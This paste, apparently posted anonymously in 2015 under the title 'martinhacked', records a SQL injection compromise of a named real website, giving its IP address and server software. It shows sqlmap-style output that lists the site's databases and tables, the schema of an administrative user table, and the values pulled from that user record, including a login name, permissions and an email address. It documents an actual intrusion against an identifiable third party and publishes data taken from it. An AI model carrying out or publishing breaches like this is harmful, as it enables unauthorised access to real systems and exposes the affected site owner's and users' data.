martinhacked

a guest, Feb 6th, 2015
Target: http://martin-schulz.info/
Vulnerability type: SQL injection
IP: 80.83.122.216
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
banner: '5.1.73'

screenshots http://prntscr.com/61uc1l   http://prntscr.com/61uci1

available databases [2]:
[*] information_schema
[*] usrdb_martiib9_v7redsys

Database: usrdb_martiib9_v7redsys
[11 tables]
+-----------------+
| aktuelles       |
| blog            |
| cms_navigation  |
| cms_page        |
| mediathek       |
| presse          |
| quiz            |
| quiz_teilnehmer |
| termine         |
| umfrage         |
| userbw          |
+-----------------+
Database: usrdb_martiib9_v7redsys
Table: userbw
[14 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| aktiv          | varchar(4)   |
| anrede         | varchar(4)   |
| benutzername   | varchar(50)  |
| berechtigungen | text         |
| bilder         | longtext     |
| email          | varchar(100) |
| entwurf        | varchar(4)   |
| id             | int(11)      |
| last_login     | datetime     |
| nachname       | varchar(50)  |
| passwort       | varchar(50)  |
| telefon        | varchar(30)  |
| titel          | varchar(20)  |
| vorname        | varchar(50)  |

[11:40:34] [INFO] fetching entries for table 'userbw' in database 'usrdb_martiib9_v7redsys'
[11:40:34] [INFO] the SQL query used returns 1 entries
[11:40:35] [INFO] retrieved: ja
[11:40:36] [INFO] retrieved: Herr
[11:40:37] [INFO] retrieved: nagkEeegjfwsnAxfEreqyupq
[11:40:41] [INFO] retrieved: a:9:{s:9:"aktuelles";b:1;s:7:"termine";b:1;s:6:"presse";b:1;s:7:"umfrage";b:1;s:4:"quiz";b:1;s:4:"blog";b:1;s:9:"mediathek";b:1;s:3:"cms";b:1;s:4:"user";b:1;}
[11:40:43] [INFO] retrieved: a:1:{i:0;a:7:{i:0;s:10:"1229684947";i:1;s:3:"394";i:2;s:3:"209";i:3;s:9:"dummy.jpg";i:4;s:2:"15";i:5;s:5:"26 KB";i:6;s:3:"jpg";}}
[11:40:45] [INFO] retrieved: info@visualseven.de
[11:40:45] [INFO] retrieved:
[11:40:46] [INFO] retrieved: 1

Database: usrdb_martiib9_v7redsys
Table: userbw
[1 entry]

database management system users [1]:
[*] 'martiib9'@'localhost'